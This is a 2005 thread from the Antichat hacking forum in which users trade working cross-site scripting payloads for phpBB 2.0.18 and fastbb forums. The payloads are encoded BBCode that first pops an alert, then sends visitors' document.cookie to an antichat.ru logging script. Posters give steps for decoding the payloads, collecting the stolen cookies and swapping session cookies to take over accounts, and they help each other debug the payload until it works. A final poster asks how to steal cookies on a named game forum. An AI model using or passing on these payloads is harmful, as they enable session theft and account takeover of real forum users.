phpbb 2.0.18 ?

Discussion in 'Forum for discussion of ANTICHAT' started by néM3S!s, 25 Nov 2005.

  1. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
  2. Deniska

    Deniska Elder - Старейшина

    Joined:
    27 Jul 2005
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    I toiled again from inaction, and I think.... I shall go phpBB 2.0.18 breakings.. Has not spent some seconds, catch a code alert more shortly:

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]

    Code Sniffera:

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
    Clean signs "+" In SPECIAL symbols!

    http: // webmastertools.narod.ru/OnlineTools/url_decode.html

    For editing cookie here to you the reference. Is better in the Opera and not forget, that change only phpbb2mysql_data a phpbb2mysql_sid can not change and not touch. The sniffer is done using this reference:

    http: // www.h4cky0u.org/encrypt/index.php

    Well and to whom it is interesting, read this clause for preventive maintenance

    http: // forum.antichat.ru/thread10119.html

    How to break fastbb under the numerous request to visitors antichat

    Alert:
    HTML:
    [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]
    Sniffer:

    HTML:
    [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]


    P.S. The continue coming soon. (Monday)
     
    #2 Deniska, 25 Nov 2005
    Last edited: 25 Nov 2005
  3. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Excellent !!! BiG ThX Deniska
     
  4. tys

    tys Banned

    Joined:
    25 Nov 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    I was marking around again, (as usual), so I thought to myself: > I think I will go hack phpbb now..."

    So off I went! So I spent a few seconds on it..anyway....here is the alert function.

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]wj[/url][/url]
    Sniffer's code:

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
    Eliminate all the plus signs from the above code.

    http://webmastertools.narod.ru/OnlineTools/url_decode.html

    Use this link, to encode your cookies.

    For tempering with your cookies, you ought to use Opera and don't forget, that you are only supposed to touch "phpbb2mysql_data" so "phpbb2mysql_data" should be left as it is.

    Sniffer's codes are made using the following url:

    http://www.h4cky0u.org/encrypt/index.php

    And to anybody who is interested, they should read this article just because.


    Because of the many requests that were made by antichat users, here is a way to hack fastbb.ru

    HTML:
    [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;]][/font]
    (It doesn't actually work anymore)

    HTML:
    [font color=[img src=http://www.wj.gif/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie); ]][/font]
    I don't know what the security is like on fastbb.ru but if necessity calls, you can always change Administrator's password by yourself.



    You can actually use this link for the complete reference and it's easier as well...

    http://kobeluga.narod.ru/codes.txt
     
    #4 tys, 25 Nov 2005
    Last edited: 25 Nov 2005
  5. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Can you make a movie please ?
     
  6. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    There is not present about phpbb 2.0.18 more.
    To take a code - to clean "+" in special symbols - to put on a forum - to receive coocies here: antichat.ru/sniff/log.php
    Alert for check. It is possible to check up on a preview - your coocies will come.
    The code works only in IE.
     
  7. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Sorry.. but I don't receve a cookie in http://antichat.ru/sniff/log.php with this script

    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
    :rolleyes:
     
  8. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    alarm on the other hand functions well
     
  9. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    "+" should be cleaned everywhere except for "+document.cookie"
    What shows a forum on a preview?
     
  10. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Yes it is !

    Thank you very much my friend...

    Antichat powaaaa ! :D
     
  11. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
  12. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
  13. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    ThX.. i'm stupid.. :)
     
  14. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Don't know how to use it??)
     
  15. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    yes, I know.. thx
    I'm stupid because I ask before seeking..
    I have make my personal encoder :)
     
  16. roruda_semu

    roruda_semu New Member

    Joined:
    17 Dec 2005
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -3
    sorry but i want to learn an information about this code
    Code:
    [url]http://www.[email][email protected] style=`background:expression(alert(/wj/))`[/email][/url]
    
    how can i steal cookie of someone by this code? can anyone help me about this? i dont know how to inject in this code image code to steal cookie . site== www.ogame.org (forum)
     
  17. roruda_semu

    roruda_semu New Member

    Joined:
    17 Dec 2005
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -3